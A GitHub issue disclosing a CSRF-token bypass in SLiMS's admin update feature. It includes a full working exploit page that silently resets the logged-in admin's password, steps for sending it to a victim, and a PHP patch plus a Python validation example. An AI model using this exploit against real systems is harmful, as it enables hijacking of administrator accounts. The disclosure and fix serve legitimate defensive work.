
[SECURITY BUG] Full Account Take Over Via Bypass CSRF Protection On Update Admin Features #103

Open
jrsfaisal opened this issue Jun 21, 2018 · 1 comment

Comments

@jrsfaisal

jrsfaisal commented Jun 21, 2018

Hello,

I found a security bug in the update admin feature. That feature already has CSRF protection, but it can be bypassed.

Through this bug and carelessness on the part of an (admin-level) user, an attacker can fully take over the admin account.

Proof of concept

  1. When updating admin data, a CSRF token is already present.
    [screenshot: 6_bypass csrf 1]

  2. Unfortunately, however, there is no server-side check for the presence of the csrf_token parameter. The csrf_token parameter can be removed when the data is POSTed, so the protection can be bypassed. Below is the CSRF exploit script that can be used to exploit this flaw.

<html>
  <body onload="submitRequest()">
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.100.18:81\/slims\/admin\/modules\/system\/app_user.php?changecurrent=true&action=detail&ajaxload=1", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=--------863798609");
        xhr.withCredentials = true;
        var body = "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"form_name\"\r\n" + 
          "\r\n" + 
          "mainForm\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"userName\"\r\n" + 
          "\r\n" + 
          "admin\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"realName\"\r\n" + 
          "\r\n" + 
          "admin\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"userType\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"eMail\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[fb]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[tw]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[li]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[rd]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[pn]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[gp]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[yt]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[bl]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[ym]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"base64picstring\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"passwd1\"\r\n" + 
          "\r\n" + 
          "faisal\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"passwd2\"\r\n" + 
          "\r\n" + 
          "faisal\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"saveData\"\r\n" + 
          "\r\n" + 
          "Update\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"updateRecordID\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "----------863798609--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
  </body>
</html>

  3. Save the exploit script above as an HTML file.

  4. Send exploit.html to a victim who is logged in to their SLiMS.
    [screenshot: 6_bypass csrf 2]

  5. Below is the response resulting from the change to the admin data.
    [screenshot: 6_bypass csrf 3]

  6. Once that succeeds, the attacker can take over the account by logging in to the victim's SLiMS system using
    username : admin
    password : faisal

@drajathasan
Contributor

drajathasan commented Aug 9, 2018

Works on my side. In app_user.php the CSRF token check is not applied, which is what makes this bug so easy to exploit, because every form in SLiMS is already equipped with a CSRF token.

Adding this script

// Reject the request unless the submitted form token matches the session's token
if (!simbio_form_maker::isTokenValid()) {
    utility::jsAlert(__('Invalid form submission token!'));
    // Record the failed check in the staff log together with the client address
    utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'system', 'Invalid form submission token, might be a CSRF attack from '.$_SERVER['REMOTE_ADDR']);
    exit();
}

to the saveData statement is enough to patch this bug.
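The point of the fix above is that the server must fail closed: a request whose csrf_token field was simply removed has to be rejected, not treated as valid. The following added example (not SLiMS code) models that check in Python; the names `issue_token`, `is_token_valid`, `handle_update` and `demo` are hypothetical, and the forged request reuses the field names from the PoC above with the token field stripped.

```python
import hmac
import secrets

TOKEN_FIELD = "csrf_token"  # form field the report says could simply be dropped


def issue_token(session: dict) -> str:
    """Generate a per-session token and keep the server-side copy in the session."""
    token = secrets.token_hex(32)
    session[TOKEN_FIELD] = token
    return token


def is_token_valid(session: dict, form: dict) -> bool:
    """True only if the form carries a non-empty token equal to the session's.

    A missing field, empty value or non-string value is rejected, so removing the
    parameter from the POST body no longer bypasses the check. The comparison is
    constant-time to avoid leaking the token byte by byte."""
    expected = session.get(TOKEN_FIELD)
    submitted = form.get(TOKEN_FIELD)
    if not expected or not isinstance(submitted, str) or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_update(session: dict, form: dict, users: dict) -> str:
    """Model of the saveData branch: validate the token before touching any data."""
    if "saveData" not in form:
        return "ignored"
    if not is_token_valid(session, form):
        return "rejected: invalid form submission token"
    uid = form.get("updateRecordID")
    if uid in users and form.get("passwd1") == form.get("passwd2"):
        users[uid]["password"] = form["passwd1"]  # a real app hashes this
        return "updated"
    return "rejected: bad record or password mismatch"


def demo():
    # Constructed sample data: one admin record and one logged-in session.
    users = {"1": {"userName": "admin", "password": "original"}}
    session = {}
    token = issue_token(session)
    legit = {"saveData": "Update", "updateRecordID": "1",
             "passwd1": "new", "passwd2": "new", TOKEN_FIELD: token}
    # Cross-site forgery modelled on the PoC: same fields, no csrf_token at all.
    forged = {"saveData": "Update", "updateRecordID": "1",
              "passwd1": "faisal", "passwd2": "faisal"}
    ok = handle_update(session, legit, users)
    denied = handle_update(session, forged, users)
    return ok, denied, users["1"]["password"]
```

Running `demo()` returns `("updated", "rejected: invalid form submission token", "new")`: the legitimate form succeeds and the forged request never reaches the password update.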
